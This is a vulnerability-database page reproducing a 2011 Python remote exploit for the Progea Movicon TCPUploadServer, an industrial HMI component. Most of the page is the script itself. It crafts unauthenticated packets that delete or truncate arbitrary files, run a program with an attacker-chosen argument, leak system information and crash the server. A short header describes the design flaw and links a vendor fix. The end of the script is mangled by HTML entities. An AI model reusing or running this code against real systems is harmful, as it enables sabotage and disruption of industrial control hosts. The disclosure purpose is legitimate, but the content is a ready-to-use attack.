Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:25989
HistoryMar 23, 2011 - 12:00 a.m.

rogea Movicon TCPUploadServer Remote Exploit

2011-03-2300:00:00
vulners.com
43
JSON

#!/usr/bin/python

movi.py

Progea Movicon TCPUploadServer Remote Exploit

Jeremy Brown / jbrown at patchtuesday dot org

Mar 2011

TCPUploadServer allows remote users to execute functions on the server

without any form of authentication. Impacts include deletion of arbitrary

files, execution of a program with an arbitrary argument, crashing the

server, information disclosure, and more. This design flaw puts the host

running this server at risk of potentially unauthorized functions being

executed on the system.

Tested on Progea Movicon 11 TCPUploadServer running on Windows

Fix: http://support.progea.com/download/Mov11.2_Setup.zip

import sys
import socket

hdr="MovX"

funcs=(1,2,3,4,5,6,7,8) # "B" is listed as 8 only for convience. other functions include (the real) 8, 9, A, and V

if len(sys.argv)<3:
print "Progea Movicon TCPUploadServer Remote Exploit"
print "Usage: %s <target> <function> [data]"%sys.argv[0]
print "\nWhat would you like to do?\n"
print "[1] Create a folder"
print "[2] Overwrite a file with NULL and cause 100%% CPU"
print "[3] Delete a file"
print "[4] Execute moviconRunTime.exe with a specified argument"
print "[5] Create a desktop shortcut"
print "[6] Retrieve drive information"
print "[7] Retrieve os service pack"
print "[8] Crash the server\n"
print "* Default data is \"test\""
sys.exit(0)

target=sys.argv[1]
port=10651
cs=target,port

func=int(sys.argv[2])

if len(sys.argv)==4:
data=sys.argv[3]
else:
data="test"

if func not in funcs:
print "Invalid function"
sys.exit(1)

if(func==1):
print "Crafting a packet to create the folder \"%s\"…"%data
pkt=hdr+"1"+"B"+data+"\x00"*(66-len(data))

elif(func==2):
print "Crafting a packet to truncate (or create) the file \"%s\" to 0 bytes and cause 100%% CPU…"%data
pkt=hdr+"2"+"B"+data+"\x00"*(66-len(data))
# O_RDWR|O_CREAT|O_TRUNC, might be more to this, it's supposedly a copy function, but i'm moving on

elif(func==3):
print "Crafting a packet to delete the file \"%s\"…"%data
pkt=hdr+"3"+"B"+data+"\x00"*(66-len(data))

elif(func==4):
print "Crafting a packet to execute moviconRunTime.exe with the argument \"%s\"…"%data
pkt=hdr+"4"+"BB"+data+"\x00"*(65-len(data))

elif(func==5):
print "Crafting a packet to create a desktop shortcut with the name (also appended to the link path) \"%s\"…"%data
pkt=hdr+"5"+"B"+data+"\x00"*(66-len(data))

elif(func==6):
print "Crafting a packet to retrieve drive information…"
pkt=hdr+"6"+"\x01"

elif(func==7):
print "Crafting a packet to retrieve os service pack…"
pkt=hdr+"7"+"\x00"

elif(func==8):
print "Crafting a packet to crash the server…"
pkt=hdr+"B"+"\x00"

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(cs)

sock.send(pkt)
sock.send(pkt)

print "\nPacket sent!"

if((func==6)|(func==7)):
info=sock.recv(128)

 if&#40;info&#41;:
      print &quot;&#92;nRetrieved info:&#92;n&quot;
      if&#40;func==6&#41;:
           print &quot;&#37;s&quot;&#37;info[6:]
      elif&#40;func==7&#41;:
           print &quot;&#37;s&quot;&#37;info[22:]
 else:
      print &quot;&#92;nNo info&quot;

sock.close()

JSON